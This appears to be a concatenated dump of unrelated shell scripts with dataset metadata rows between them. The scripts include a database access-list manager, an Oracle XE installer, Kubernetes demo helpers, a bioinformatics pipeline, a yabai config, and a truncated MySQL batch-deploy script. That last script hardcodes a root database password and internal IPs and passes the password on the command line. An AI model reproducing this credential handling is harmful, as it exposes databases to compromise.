sed -e "s|${oldReadWriteAccessList}|${readWriteAccessList}|g" tmpAccessList.txt
fi
}
setREADAccess(){
readAccessList=''
oldReadAccessList=$(cat tmpREADAccessStatus.txt | tr -d '\n')
# echo "old list is $oldMasterAccessList"
for schemaName in $(echo $schemaNames | sed "s/,/ /g")
do
if [[ $schemaName == '' ]]; then
echo 'No schemaName is provided as argument - Will break this execution'
else
echo "Working on $schemaName"
tmpRead=$(grep -i "$schemaName" tmpREADAccessStatus.txt | wc -l | tr -d ' ')
tmpReadWrite=$(grep -i "$schemaName" tmpREADWRITEAccessStatus.txt | wc -l | tr -d ' ')
tmpMaster=$(grep -i "$schemaName" tmpMASTERAccessStatus.txt | wc -l | tr -d ' ')
echo "tmpRead is $tmpRead"
echo "tmpReadWrite is $tmpReadWrite"
echo "tmpMaster is $tmpMaster"
if [[ ($tmpReadWrite -gt 0) || ($tmpMaster -gt 0) || ($tmpRead -gt 0) ]]; then
echo "Read entry already exists for $schemaName"
else
echo "Read entry does not exists for $schemaName - creating the same"
if [[ $readAccessList == '' ]]; then
if [[ $oldReadAccessList == '' ]]; then
readAccessList="mstr_${batchUser} READ ${schemaName}"
else
readAccessList="$(cat tmpREADAccessStatus.txt), $schemaName"
fi
else
readAccessList="$readAccessList, $schemaName"
fi
fi
fi
done
echo "old list is $oldReadAccessList"
echo "Final read access list is $readAccessList"
echo "Appending this list to tmp file"
# echo "$masterAccessList" >> tmpMASTERAccessStatus.txt
if [[ $readAccessList == '' ]]; then
echo 'No new entries to modify - Read entries already qualified'
elif [[ $oldReadAccessList == '' ]]; then
echo 'Creating new entries as READ is empty'
echo "$readAccessList" >> tmpAccessList.txt
else
echo 'Replacing READ entries'
sed -e "s|${oldReadAccessList}|${readAccessList}|g" tmpAccessList.txt
fi
}
sendNotifications(){
getSSMParameters
aws ses send-email \
--from "a2isupport@axiomtelecom.com" \
--destination "ToAddresses=$devopsMailList","CcAddresses=yogesh.patil@axiomtelecom.com" \
--message "Subject={Data=${env} | ${dbClient} | A2i Access Modification Notification ,Charset=utf8},Body={Text={Data=Testing Body,Charset=utf8},Html={Data=Hi All\,<br><br>This is to notify you all that access has been modified in <b>$env</b> environment for <b>$dbClient</b> db for <b>${schemaNames//,/\,} </b> schemas.<br>Batch user <b>$batchUser</b> is now having <b>${accessLevel} </b> on mentioned schemas.<br>Please reach out to devops in case of any issues.<br><br>Thanks and Regards\,<br>DevOps Team,Charset=utf8}}" \
--profile prod
}
#######################################################################
############################# Main Function ###########################
#######################################################################
echo "dbClient is $dbClient"
getProfile
getConnectionDetails
fetchAccessListFromS3
getCurrentAccessStatus
checkAccessStatus
setAccessListInS3
grantAccess
sendNotifications
#############################
########## CleanUp ##########
#############################
echo "Working on CleanUp"
# sudo rm -rf ./tmp*
| true
|
9c5fccbac35f34cd3b3c3748f8fca8fdadacb71f
|
Shell
|
micydog/javaexample
|
/linuxexmp/usbshell
|
UTF-8
| 342
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
#autousb
echo "welcome to use sutousb"
echo "do you want load usb(y/n)?"
read ans
if [ $ans = "Y" -o $ans = "y" ]
then
if [ -d "/mnt/usb" ]
then
mount -t vfat /dev/sdb1 /mnt/usb
else
mkdir /mnt/usb
if [ $? qe 0 ]
then
echo "create /mnt/usb sucess"
mount -t vfat /dev/sdb1 /mnt/usb
fi
fi
fi
| true
|
b5ebce1d9255d60f62d3502801caa40f9fe36a61
|
Shell
|
mjbright/christian-posta.kube-demos
|
/util.sh
|
UTF-8
| 2,527
| 3.953125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
NS="demos"
readonly color_reset=$(tput sgr0)
readonly red=$(tput bold; tput setaf 1)
readonly green=$(tput bold; tput setaf 2)
readonly yellow=$(tput bold; tput setaf 3)
readonly blue=$(tput bold; tput setaf 4)
readonly magenta=$(tput bold; tput setaf 5)
readonly cyan=$(tput bold; tput setaf 6)
function die {
echo "$0: ${red}die - $*${color_reset}" >&2
for i in 0 1 2 3 4 5 6 7 8 9 10;do
CALLER_INFO=`caller $i`
[ -z "$CALLER_INFO" ] && break
echo " Line: $CALLER_INFO" >&2
done
exit 1
}
[ -z "$K8S_ENV" ] &&
die "Export K8S_ENV as either minishift/minikube/node/vagrant"
# wait_on_pods <POD_NAME>
# - wait for pod to be in Running state
# TODO: modify to wait on N/N containers
function wait_on_pods() {
local POD_NAME=$1; shift
echo "Waiting for $POD_NAME Pod to be in Running state"
while kubectl -n $NS get pods $POD_NAME --no-headers | grep Running; do echo "..."; sleep 1; done
kubectl -n $NS get pods $POD_NAME
}
# node-run <COMMAND>
# - Run comand on master node
function node_run() {
case $K8S_ENV in
# node: we're running directly on a cluster node:
node) eval "$*";;
# TO TEST:
# *: connect to node via vagrant/minishift/minikube as appropriate
vagrant) vagrant ssh master -- eval "$*";;
minishift) minishift ssh -- eval "$*";;
minikube) minikube ssh -- eval "$*";;
# TO implement:
#pod) kubectl run node_run_pod --image alpine:latest --rm -it -- /bin/sh -c "eval '$*'";;
*) die "Not implemented K8S_ENV='$K8S_ENV'";;
esac
}
function desc() {
maybe_first_prompt
echo "$blue# $@$color_reset"
prompt
}
function prompt() {
echo -n "$yellow\$ $color_reset"
}
started=""
function maybe_first_prompt() {
if [ -z "$started" ]; then
prompt
started=true
fi
}
function backtotop() {
clear
}
function run() {
maybe_first_prompt
rate=25
if [ -n "$DEMO_RUN_FAST" ]; then
rate=1000
fi
echo "$green$1$color_reset" | pv -qL $rate
if [ -n "$DEMO_RUN_FAST" ]; then
sleep 0.5
fi
eval "$1"
r=$?
read -d '' -t 1 -n 10000 # clear stdin
prompt
if [ -z "$DEMO_AUTO_RUN" ]; then
read -s
fi
return $r
}
function relative() {
for arg; do
echo "$(realpath $(dirname $(which $0)))/$arg" | sed "s|$(realpath $(pwd))|.|"
done
}
SSH_NODE=$(kubectl get nodes | tail -1 | cut -f1 -d' ')
trap "echo" EXIT
| true
|
ba961dccb99cc6adccb3aa812e2a485b8bafb13c
|
Shell
|
hochwagenlab/General_HiSeq_Functions
|
/Sam2Bedgraph.pbs
|
UTF-8
| 1,215
| 2.875
| 3
|
[] |
no_license
|
#!/bin/bash
#PBS -l nodes=1:ppn=1,walltime=3:00:00
#PBS -N Sam2Bedgraph
#PBS -M ${USER}@nyu.edu
#PBS -m abe
#PBS -o localhost:/scratch/${USER}/${PBS_JOBNAME}.o${PBS_JOBID}
#PBS -e localhost:/scratch/${USER}/${PBS_JOBNAME}.o${PBS_JOBID}
module load samtools/intel/1.2
module load bedtools/intel/2.23.0
# Purpose: to convert a folder of SAM files into bedgraphs
# In this example code, the first folder is assumed be only files mapped to SK1
# and the second folder is assumed to be only filed mapped to SacCer3
cd /scratch/tem298/sk1/
shopt -s nullglob # Avoid expanding to *.sam if there were no .sam files in directory
for f in *.sam
do
samtools view -h $f > ${f}.bam
samtools sort $f.bam ${f}.sorted
samtools index $f.sorted.bam
samtools view -b $f.sorted.bam | genomeCoverageBed -ibam stdin -bg -g ~/Library/sk1_MvO_V1.chrLen.txt > ${f}.bedgraph
done
cd ../S288C/
shopt -s nullglob # Avoid expanding to *.sam if there were no .sam files in directory
for g in *.sam
do
samtools view -h ${g} > ${g}.bam
samtools sort ${g}.bam ${g}.sorted
samtools index ${g}.sorted.bam
samtools view -b ${g}.sorted.bam | genomeCoverageBed -ibam stdin -bg -g ~/Library/S288C.chrLen.txt > ${g}.bedgraph
done
exit 0;
| true
|
69ae2ea45cf392205a43fc8788645c38d1e8fff1
|
Shell
|
oracle/vagrant-projects
|
/OracleDatabase/18.4.0-XE/scripts/install.sh
|
UTF-8
| 4,403
| 3.375
| 3
|
[
"UPL-1.0",
"MIT",
"Ruby",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
#
# LICENSE UPL 1.0
#
# Copyright (c) 1982-2018 Oracle and/or its affiliates. All rights reserved.
#
# Since: July, 2018
# Author: gerald.venzl@oracle.com
# Description: Installs Oracle database software
#
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
#
# Abort on any error
set -e
echo 'INSTALLER: Started up'
# get up to date
yum upgrade -y
echo 'INSTALLER: System updated'
# fix locale warning
yum reinstall -y glibc-common
echo LANG=en_US.utf-8 >> /etc/environment
echo LC_ALL=en_US.utf-8 >> /etc/environment
echo 'INSTALLER: Locale set'
# set system time zone
sudo timedatectl set-timezone $SYSTEM_TIMEZONE
echo "INSTALLER: System time zone set to $SYSTEM_TIMEZONE"
# Install Oracle Database prereq and openssl packages
# (preinstall is pulled automatically with 18c XE rpm, but it
# doesn't create /home/oracle unless it's installed separately)
yum install -y oracle-database-preinstall-18c openssl
echo 'INSTALLER: Oracle preinstall and openssl complete'
# set environment variables
echo "export ORACLE_BASE=/opt/oracle" >> /home/oracle/.bashrc
echo "export ORACLE_HOME=/opt/oracle/product/18c/dbhomeXE" >> /home/oracle/.bashrc
echo "export ORACLE_SID=XE" >> /home/oracle/.bashrc
echo "export PATH=\$PATH:\$ORACLE_HOME/bin" >> /home/oracle/.bashrc
echo 'INSTALLER: Environment variables set'
# Install Oracle
# if installer doesn't exist, download it
db_installer='oracle-database-xe-18c-1.0-1.x86_64.rpm'
if [[ ! -f /vagrant/"${db_installer}" ]]; then
echo 'INSTALLER: Downloading Oracle Database software'
(
cd /vagrant || exit 1
curl -L -O -s https://download.oracle.com/otn-pub/otn_software/db-express/"${db_installer}"
)
fi
yum -y localinstall /vagrant/"${db_installer}"
if [[ "${KEEP_DB_INSTALLER,,}" == 'false' ]]; then
rm -f /vagrant/"${db_installer}"
fi
echo 'INSTALLER: Oracle software installed'
# Auto generate ORACLE PWD if not passed on
export ORACLE_PWD=${ORACLE_PWD:-"`openssl rand -base64 8`1"}
# Create database
mv /etc/sysconfig/oracle-xe-18c.conf /etc/sysconfig/oracle-xe-18c.conf.original
cp /vagrant/ora-response/oracle-xe-18c.conf.tmpl /etc/sysconfig/oracle-xe-18c.conf
chmod g+w /etc/sysconfig/oracle-xe-18c.conf
sed -i -e "s|###LISTENER_PORT###|$LISTENER_PORT|g" /etc/sysconfig/oracle-xe-18c.conf
sed -i -e "s|###EM_EXPRESS_PORT###|$EM_EXPRESS_PORT|g" /etc/sysconfig/oracle-xe-18c.conf
sed -i -e "s|###ORACLE_CHARACTERSET###|$ORACLE_CHARACTERSET|g" /etc/sysconfig/oracle-xe-18c.conf
sed -i -e "s|###ORACLE_PWD###|$ORACLE_PWD|g" /etc/sysconfig/oracle-xe-18c.conf
su -l -c '/etc/init.d/oracle-xe-18c configure'
chmod o+r /opt/oracle/product/18c/dbhomeXE/network/admin/tnsnames.ora
# add tnsnames.ora entry for PDB
echo "XEPDB1 =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = $LISTENER_PORT))
(CONNECT_DATA =
(SERVER = DEDICATED)
(SERVICE_NAME = XEPDB1)
)
)
" >> /opt/oracle/product/18c/dbhomeXE/network/admin/tnsnames.ora
echo 'INSTALLER: Database created'
# enable global port for EM Express
su -l oracle -c 'sqlplus / as sysdba <<EOF
EXEC DBMS_XDB_CONFIG.SETGLOBALPORTENABLED (TRUE);
exit
EOF'
echo 'INSTALLER: Global EM Express port enabled'
# configure systemd to start oracle instance on startup
sudo systemctl daemon-reload
sudo systemctl enable oracle-xe-18c
sudo systemctl start oracle-xe-18c
echo "INSTALLER: Created and enabled oracle-xe-18c systemd's service"
sudo cp /vagrant/scripts/setPassword.sh /home/oracle/
sudo chown oracle:oinstall /home/oracle/setPassword.sh
sudo chmod u+x /home/oracle/setPassword.sh
echo "INSTALLER: setPassword.sh file setup";
# run user-defined post-setup scripts
echo 'INSTALLER: Running user-defined post-setup scripts'
for f in /vagrant/userscripts/*
do
case "${f,,}" in
*.sh)
echo "INSTALLER: Running $f"
. "$f"
echo "INSTALLER: Done running $f"
;;
*.sql)
echo "INSTALLER: Running $f"
su -l oracle -c "echo 'exit' | sqlplus -s / as sysdba @\"$f\""
echo "INSTALLER: Done running $f"
;;
/vagrant/userscripts/put_custom_scripts_here.txt)
:
;;
*)
echo "INSTALLER: Ignoring $f"
;;
esac
done
echo 'INSTALLER: Done running user-defined post-setup scripts'
echo "ORACLE PASSWORD FOR SYS, SYSTEM AND PDBADMIN: $ORACLE_PWD";
echo "INSTALLER: Installation complete, database ready to use!";
| true
|
24cdf9ea38f4f62ccfbada3c5b87d08f76f30228
|
Shell
|
PlayFab/SDKGenerator
|
/SetupScripts/testInit.sh
|
UTF-8
| 1,685
| 3.75
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
# USAGE: testInit.sh
if [ -f "util.sh" ]; then
. "./util.sh" 2> /dev/null
. "./sdkUtil.sh" 2> /dev/null
elif [ ! -z "$WORKSPACE" ]; then
. "$WORKSPACE/SdkGenerator/SetupScripts/util.sh" 2> /dev/null
. "$WORKSPACE/SdkGenerator/SetupScripts/sdkUtil.sh" 2> /dev/null
fi
CheckVerticalizedParameters
DoJcuNugetUpdate () {
DoesCommandExist nuget || return 1
pushd "$WORKSPACE/SDKGenerator/JenkinsConsoleUtility"
nuget restore JenkinsConsoleUtility.sln
popd
}
# USAGE: ResetRepo
ResetRepo () {
echo === ResetRepo $PWD, $@ ===
# Assumes the current directory is set to the repo to be reset
CheckCreds
git fetch --progress origin
git checkout master || git checkout -b master || CleanCurrentRepo
git pull origin master
# Delete $GitDestBranch, reset it to master, prep for next build and fresh write
if [ "$GitDestBranch"!="master" ]; then
git branch -D $GitDestBranch || true
git checkout -b $GitDestBranch || true
git checkout $GitDestBranch
fi
}
# USAGE: DoWork
DoWork () {
echo == DoWork $PWD, $@ ==
SyncGitHubRepo "$WORKSPACE" "SDKGenerator" "SDKGenerator" "$GitSdkGenBranch"
DoJcuNugetUpdate || echo "Failed to Nuget restore JenkinsConsoleUtility"
SyncGitHubRepo "$WORKSPACE/sdks" "$SdkName" "$SdkName" "$GitSdkDestBranch"
SyncGitHubRepo "$WORKSPACE" "API_Specs"
if [ ! -z "$SdkGenPrvTmplRepo" ]; then
SyncGitHubRepo "$WORKSPACE/SDKGenerator/privateTemplates" "$SdkGenPrvTmplRepo" "$SdkGenPrvTmplRepo" "$GitPrvTmplBranch"
fi
ForcePushD "$WORKSPACE/sdks/$SdkName"
ResetRepo
}
echo === Beginning testInit ===
DoWork "$@"
| true
|
f04c245aa84c638fb7366d94803a9a60c0973761
|
Shell
|
kkysen/BashConfig
|
/functions/moveTo.sh
|
UTF-8
| 98
| 2.765625
| 3
|
[
"MIT"
] |
permissive
|
moveTo() {
mv "${2}" "${1}"
}
export -f moveTo
mvTo() {
moveTo "${@}"
}
export -f mvTo
| true
|
4407ba3957fdfb65ac2e9a9d59c495bb3af04d58
|
Shell
|
serdarakis/PackagingChallenge
|
/Scripts/publish.sh
|
UTF-8
| 235
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
API_KEY="<Api-Key>"
FOLDER="../Packages/"
SOURCE="https://api.nuget.org/v3/index.json"
for entry in "$FOLDER"*
do
echo "$entry"
dotnet nuget push "$entry" --api-key "$API_KEY" --source "$SOURCE" --skip-duplicate
done
| true
|
f81f0f47f763642385fda9be9af04e7bb1c9ea9b
|
Shell
|
sittim/configs
|
/.config/i3/xrandr_deamon.sh
|
UTF-8
| 753
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
onConnection() {
echo onConnection
xrandr --output eDP1 --auto
xrandr --output DP1 --off
}
onDisconnection() {
echo onDisconnection
xrandr --output eDP1 --off
xrandr --output DP1 --auto
}
#########################
statefile="`mktemp`"
quit() {
rm "$statefile"
exit 1
}
trap quit SIGINT SIGTERM
getstate() {
state="`xrandr -q | wc -l`"
}
savestate() {
echo "$state" > "$statefile"
}
getstate
savestate
xev -root -event randr | grep --line-buffered XRROutputChangeNotifyEvent | \
while IFS= read -r line; do
getstate
old="`cat "$statefile"`"
if [ "$state" -gt "$old" ]; then
onConnection
elif [ "$state" -lt "$old" ]; then
onDisconnection
fi
savestate
done
| true
|
f2bfbf58f2ef2850a5ecec86dead371eba481cc9
|
Shell
|
cih9088/dotfiles
|
/config/yabai/yabairc
|
UTF-8
| 3,572
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#
# the scripting-addition must be loaded manually if
# one is running yabai on macOS Big Sur.
# for this to work one must configure sudo such that
# it will be able to run the command without password
#
# see this wiki page for information:
# - https://github.com/koekeishiya/yabai/wiki/Installing-yabai-(latest-release)#configure-scripting-addition
#
# if OS version is greater than big sur,
big_sur_version=11.0
if [ "$(printf '%s\n' "$(sw_vers -productVersion)" "$big_sur_version" | sort -V | head -n 1)" = "$big_sur_version" ]; then
yabai -m signal --add event=dock_did_restart action="sudo yabai --load-sa"
sudo yabai --load-sa
fi
# global settings
yabai -m config mouse_follows_focus off
yabai -m config focus_follows_mouse off
yabai -m config window_placement second_child
yabai -m config window_topmost off
yabai -m config window_opacity off
yabai -m config active_window_opacity 1.0
yabai -m config normal_window_opacity 0.90
yabai -m config window_shadow float
yabai -m config window_border off
yabai -m config window_border_width 3
yabai -m config active_window_border_color 0xff775759
yabai -m config normal_window_border_color 0xff505050
yabai -m config insert_feedback_color 0xffd75f5f
yabai -m config split_ratio 0.50
yabai -m config auto_balance off
yabai -m config mouse_modifier fn
yabai -m config mouse_action1 move
yabai -m config mouse_action2 resize
yabai -m config mouse_drop_action swap
yabai -m config external_bar all:0:25
# general space settings
yabai -m config layout bsp
yabai -m config top_padding 10
yabai -m config bottom_padding 10
yabai -m config left_padding 10
yabai -m config right_padding 10
yabai -m config window_gap 10
# Rules
yabai -m rule --add app=".*" manage=off
# yabai -m rule --add app="^System Preferences$" manage=off
# yabai -m rule --add app="^Safari$" title="^(General|(Tab|Password|Website|Extension)s|AutoFill|Se(arch|curity)|Privacy|Advance)$" manage=off
# yabai -m rule --add app="^App Store$" manage=off
# yabai -m rule --add app="^Activity Monitor$" manage=off
# yabai -m rule --add app="^KakaoTalk$" manage=off
# yabai -m rule --add app="^Movist$" manage=off
# yabai -m rule --add app="QuickTime Player" manage=off
# yabai -m rule --add app="Transmission" manage=off
# yabai -m rule --add app="Alfred Preferences" manage=off
# yabai -m rule --add app="Dictionary" manage=off
# yabai -m rule --add app="^Calculator$" manage=off
# yabai -m rule --add app="Finder" manage=off
# yabai -m rule --add app="Window 10" space=3
# yabai -m rule --add app="CleanMyMac X" manage=off
# yabai -m rule --add app="Keka" manage=off
# yabai -m rule --add app="Stats" manage=off
# yabai -m rule --add app="Bartender" manage=off
# yabai -m rule --add title='Preferences$' manage=off topmost=on
# # https://github.com/koekeishiya/yabai/issues/322
# yabai -m signal --add event=window_created action='yabai -m query --windows --window $YABAI_WINDOW_ID | jq -er ".resizable == 0 and .floating == 0" && yabai -m window $YABAI_WINDOW_ID --toggle float'
yabai -m signal --add event=window_title_changed action="sketchybar --trigger window_title_changed"
yabai -m signal --add event=window_focused action="sketchybar --trigger window_focused"
echo "yabai configuration loaded.."
| true
|
908b9fc21bba98881143f3aa0583e2ee0c5b23fb
|
Shell
|
aws/aws-ec2-instance-connect-config
|
/debian/postinst
|
UTF-8
| 2,087
| 3.65625
| 4
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/sh
set -e
#DEBHELPER#
case "$1" in
configure)
EXEC_OVERRIDE='ExecStart=/usr/sbin/sshd -D -o "AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys %%u %%f" -o "AuthorizedKeysCommandUser ec2-instance-connect" $SSHD_OPTS'
modified=1
# If there is nothing in the AuthorizedKeysCommand field of sshd_config *and* nothing in any sshd override, add our config
if ! grep -q '^[^#]*AuthorizedKeysCommand[[:blank:]]\+.*$' /etc/ssh/sshd_config ; then
if ! grep -q '^[^#]*AuthorizedKeysCommandUser[[:blank:]]\+.*$' /etc/ssh/sshd_config ; then
if ! grep -q '^[^#]*AuthorizedKeysCommandRunAs[[:blank:]]\+.*$' /etc/ssh/sshd_config ; then
# If systemd unit contains AKC don't override it
if ! grep -q "AuthorizedKeysCommand" /lib/systemd/system/ssh.service ; then
can_modify=1
if [ -d /lib/systemd/system/ssh.service.d ] ; then
# If *any* override contains an ExecStart, don't override it
if ! grep -Rq "ExecStart" /lib/systemd/system/ssh.service.d/ ; then
can_modify=0
fi
else
# Or there are no overrides
mkdir /lib/systemd/system/ssh.service.d
can_modify=0
fi
if [ $can_modify -eq 0 ] ; then
# Add our configuration
printf "%s\n%s\n%s\n" "[Service]" "ExecStart=" "${EXEC_OVERRIDE}" > /lib/systemd/system/ssh.service.d/ec2-instance-connect.conf
modified=0
fi
fi
fi
fi
fi
if [ $modified -eq 0 ] ; then
systemctl daemon-reload
echo "sshd override added, restarting daemon"
deb-systemd-invoke restart ssh.service
fi
;;
esac
| true
|
a4029996804bb70272dbff3576ca52c670e32e0f
|
Shell
|
allenai/zest
|
/bin/train_bart_run_eval.sh
|
UTF-8
| 1,652
| 2.65625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# ./bin/train_bart_run_eval.sh /path/to/zest/data learning_rate num_epochs
DATADIR=$1
shift;
LR=$1
shift;
EPOCHS=$1
conda activate zest_bart
OUTDIR=bart_large_${LR}_${EPOCHS}epochs_smoothing0.1
echo "TRAINING $LR $EPOCHS $OUTDIR"
python bin/fine_tune_bart.py \
--task=zest \
--data_dir=$DATADIR \
--model_name_or_path=facebook/bart-large \
--learning_rate=$LR \
--train_batch_size=8 \
--gradient_accumulation_steps=4 \
--accumulate_grad_batches=4 \
--eval_batch_size=1 \
--num_train_epochs=$EPOCHS \
--check_val_every_n_epoch=100 \
--warmup_steps=100 \
--gpus=1 \
--do_train \
--do_predict \
--early_stopping_patience=-1 \
--max_grad_norm=0.1 \
--gradient_clip_val=0.1 \
--fp16 \
--fp16_opt_level=O2 \
--weight_decay=0.01 \
--adam_epsilon=1e-8 \
--lr_scheduler=linear \
--dropout=0.1 \
--attention_dropout=0.1 \
--max_source_length=512 \
--max_target_length=64 \
--val_max_target_length=64 \
--test_max_target_length=64 \
--eval_beams 4 \
--eval_max_gen_length=64 \
--row_log_interval=320 \
--num_sanity_val_steps=0 \
--n_val -1 \
--freeze_embeds \
--output_dir=$OUTDIR \
--label_smoothing 0.1
# This evaluates on the dev set and writes the predictions to a file.
python bin/fine_tune_bart.py \
--evaluate_only \
--output_dir=$OUTDIR \
--model_name_or_path ignore --data_dir ignore
# Run the official eval script.
python bin/evaluate-zest.py \
--predictions-path $OUTDIR/val_preds.txt \
--dev-path $DATADIR/dev.jsonl \
--output-path $OUTDIR/val_preds_results_
| true
|
6f0af5959486d0bd7250916691d0976eb6794829
|
Shell
|
h2kfl/TAOS-CI
|
/ci/taos/config/config-plugins-audit.sh
|
UTF-8
| 3,622
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
##
# Copyright (c) 2018 Samsung Electronics Co., Ltd. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
# @file config-plugins-audit.sh
# @brief Configuraiton file to maintain audit modules (after completing a build procedure)
# @see https://github.com/nnsuite/TAOS-CI
# @author Geunsik Lim <geunsik.lim@samsung.com>
##### Set environment for audit plugins
declare -i idx=-1
###### plugins-base ###############################################################################################
echo "[MODULE] plugins-base: Plugin group is a well-maintained collection of plugin modules."
# Please append your plugin modules here.
audit_plugins[++idx]="pr-audit-build-tizen"
echo "[DEBUG] The default BUILD_MODE of ${audit_plugins[idx]} is declared with 99 (SKIP MODE) by default in plugins-base folder."
echo "[DEBUG] ${audit_plugins[idx]} is started."
echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check if Tizen rpm package is successfully generated."
echo "[DEBUG] Current path: $(pwd)."
source ${REFERENCE_REPOSITORY}/ci/taos/plugins-base/${audit_plugins[idx]}.sh
audit_plugins[++idx]="pr-audit-build-ubuntu"
echo "[DEBUG] The default BUILD_MODE of ${audit_plugins[idx]} is declared with 99 (SKIP MODE) by default in plugins-base folder."
echo "[DEBUG] ${audit_plugins[idx]} is started."
echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check if Ubuntu deb package is successfully generated."
echo "[DEBUG] Current path: $(pwd)."
source ${REFERENCE_REPOSITORY}/ci/taos/plugins-base/${audit_plugins[idx]}.sh
audit_plugins[++idx]="pr-audit-build-yocto"
echo "[DEBUG] The default BUILD_MODE of ${audit_plugins[idx]} is declared with 99 (SKIP MODE) by default in plugins-base folder."
echo "[DEBUG] ${audit_plugins[idx]} is started."
echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check if YOCTO deb package is successfully generated."
echo "[DEBUG] Current path: $(pwd)."
source ${REFERENCE_REPOSITORY}/ci/taos/plugins-base/${audit_plugins[idx]}.sh
###### plugins-good ###############################################################################################
echo "[MODULE] plugins-good: Plugin group that follow Apache license with good quality"
# Please append your plugin modules here.
###### plugins-staging ################################################################################################
echo "[MODULE] plugins-staging: Plugin group that does not have evaluation and aging test enough"
# Please append your plugin modules here.
# module_name="pr-audit-resource"
# echo "[DEBUG] $module_name is started."
# echo "[DEBUG] TAOS/$module_name: Check if there are not-installed resource files."
# echo "[DEBUG] Current path: $(pwd)."
# source ${REFERENCE_REPOSITORY}/ci/taos/plugins-staging/$module_name.sh
# $module_name
# echo "[DEBUG] $module_name is done."
# audit_plugins[++idx]="pr-audit-nnstreamer-ubuntu-apptest"
# echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check nnstreamer sample app"
# echo "[DEBUG] ${audit_plugins[idx]} is started."
# echo "[DEBUG] Current path: $(pwd)."
# source ${REFERENCE_REPOSITORY}/ci/taos/plugins-staging/${audit_plugins[idx]}.sh
| true
|
a1a69ba491bc07ea4dc8a4de0c04bf82c8efcd27
|
Shell
|
containers/automation
|
/common/test/console_output_test_helper.sh
|
UTF-8
| 690
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This helper script is intended for testing several functions
# which output calling context. It is intended to only be used
# by the console-output unit-tests. They are senitive to
# the both line-positions and line-content of all the following.
SCRIPT_DIRPATH=$(dirname "${BASH_SOURCE[0]}")
AUTOMATION_LIB_PATH=$(realpath "$SCRIPT_DIRPATH/../lib")
source "$AUTOMATION_LIB_PATH/common_lib.sh"
set +e
test_function() {
A_DEBUG=1 dbg "Test dbg message"
warn "Test warning message"
msg "Test msg message"
die "Test die message" 0
}
A_DEBUG=1 dbg "Test dbg message"
warn "Test warning message"
msg "Test msg message"
die "Test die message" 0
test_function
| true
|
ede5f7ef76850f73fcbf66f604d06797a64e54f6
|
Shell
|
UbikZ/dockerz
|
/convert/entrypoint.sh
|
UTF-8
| 346
| 3.625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
cd /home/workspace/ffmpeg
function usage() {
echo " usage: convert <options>"
echo ""
echo " -v show versions."
echo " -h show usage."
exit 1
}
case "$1" in
-v) (
echo "imageMagick : $(convert -version)"
) ;;
-h) usage ;;
*) convert "${@:1}" ;;
esac
| true
|
8c179532daf4f4554883cae6d205ffe8bff3b021
|
Shell
|
leon66666/ShellProgram
|
/dmlnew.sh
|
UTF-8
| 2,577
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
stty erase ^H
MYSQL_HOST30=127.0.0.1
MYSQL_HOST24=192.168.1.24
MYSQL_USER=root
PORT=3306
MYSQL_PASSWORD='password'
MYSQL_DATABASE30='26 27 28 29 31 32 33 34 35 36'
MYSQL_DATABASE24='hoomxb_anqi hoomxb_hehuanhuan hoomxb_liuyan hoomxb_luzongwei hoomxb_tianye hoomxb_wanghaiyang hoomxb_wanghuidong hoomxb_wangtongkai hoomxb_wangzhongqiu hoomxb_zhaoxiuhuan hoomxb_zhengdongwen'
SQL_INPUT=`cat /scripts/sql.txt`
SQL_INIT=`cat /scripts/init.txt`
echo -n -e "\e[32;1m》》请输入您要批量操作的数据库主机地址(24或者30):\e[0m"
read host
if [[ $host == '24' ]];then
for database in $MYSQL_DATABASE24
do
echo -e "\e[36;1m---$database\e[0m"
done
elif [[ $host == '30' ]];then
for database in $MYSQL_DATABASE30
do
echo -e "\e[31;1m---$database\e[0m"
done
fi
#----------------------------------------------------------------------------------------------
echo -n -e "\e[35;1m 》》请输入您要批量操作的数据库名称(提示:为空则部署全部数据库):\e[0m"
read db
case $host in
24)
if [ -z $db ]
then
for i in $MYSQL_DATABASE24
do
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${i} -e "source /scripts/sql.txt"
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${i} -e "source /scripts/init.txt"
done
else
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${db} -e "source /scripts/sql.txt"
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${db} -e "source /scripts/init.txt"
fi
;;
30)
if [ -z $db ]
then
for i in $MYSQL_DATABASE30
do
echo "192.168.1.${i}"
ssh -l hsadmin 192.168.1.${i} -C "source /etc/profile && /./scripts/kill_all.sh"
sleep 5
echo "hoomxb${i}"
mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${i} -e "source /scripts/sql.txt"
